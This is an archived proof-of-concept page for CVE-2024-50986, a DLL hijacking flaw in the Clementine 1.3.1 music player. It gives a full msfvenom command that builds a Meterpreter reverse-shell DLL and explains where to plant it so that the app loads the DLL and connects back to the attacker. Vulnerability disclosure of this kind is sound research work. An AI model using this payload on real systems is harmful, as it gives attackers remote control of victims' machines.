POC详情: 16db30c2bf8fb2f4a40cfafae05eb87b29273e35

来源
关联漏洞
标题: Clementine 安全漏洞 (CVE-2024-50986)
描述:Clementine是Clementine开源的一个多平台音乐播放器。 Clementine v1.3.1版本存在安全漏洞,该漏洞源于允许本地攻击者通过精心设计的DLL文件执行任意代码。
描述
An issue in Clementine v.1.3.1 allows a local attacker to execute arbitrary code via a crafted DLL file (DLL Hijacking)
介绍
# CVE-20224-50986: DLL Hijacking Exploit for Clementine

**Description:** An issue in Clementine v.1.3.1 allows a local attacker to execute arbitrary code via a crafted DLL file. 

**Version Affected:** Clementine v.1.3.1

**Researcher:** Utkarsh (r1971d3) [LinkedIn](https://www.linkedin.com/in/r1971d3/)

**NIST CVE Link:** https://nvd.nist.gov/vuln/detail/CVE-2024-50986

**Vulnerability Type:** Untrusted Search Path

**Affected Component:** QUSEREX.DLL

## Proof-of-Concept Exploit
### Attack Vector
To exploit this vulnerability, an attacker must craft a malicious DLL named QUSEREX.DLL and place it in the directory: C:\Users\<username>\AppData\Local\Microsoft\WindowsApps\. When the Clementine application is launched, it will load the malicious DLL, executing the attacker's code.
### Description & Usage
1. Use Process Monitor (procmon) with appropriate filters to identify missing DLLs and track where Clementine is searching for them within the Windows Operating System 

![Capture_3](https://github.com/user-attachments/assets/ea567275-8760-4897-a66d-c286d8c94320)


2. The search reveals that the DLL "QUSEREX.DLL" is being looked for in multiple locations, including C:\Users\<username>\AppData\Local\Microsoft\WindowsApps\

![Capture_4](https://github.com/user-attachments/assets/6664d628-bc69-4e3d-91d8-b228fcfce2e2)


3. A malicious DLL is created using msfvenom with the following command:
```bash
sudo msfvenom -p windows/meterpreter/reverse_tcp -ax86 -f dll LHOST=<IP Address> LPORT=<Port> > QUSEREX.DLL
```

![Capture_5](https://github.com/user-attachments/assets/0dcbb555-9416-4714-8621-4e513dadad27)


4. This malicious DLL is placed in the directory C:\Users\<username>\AppData\Local\Microsoft\WindowsApps\, where it is successfully loaded by Clementine. 

![Capture_6](https://github.com/user-attachments/assets/a57fce43-b572-4eb0-b380-a79afa7d1256)


5. Using msfconsole, a staged payload is sent through the reverse shell, resulting in a meterpreter shell session being obtained in the C:\Program Files (x86)\Clementine\projectm-presets directory on the target machine. 

![Capture_8](https://github.com/user-attachments/assets/0e826edf-9727-492c-b3c2-876d5b0d13c6)

![Capture_7](https://github.com/user-attachments/assets/f3d22843-f315-42fe-aea3-8f905145ab8a)
文件快照

[4.0K] /data/pocs/16db30c2bf8fb2f4a40cfafae05eb87b29273e35 ├── [ 34K] LICENSE └── [2.2K] README.md 0 directories, 2 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。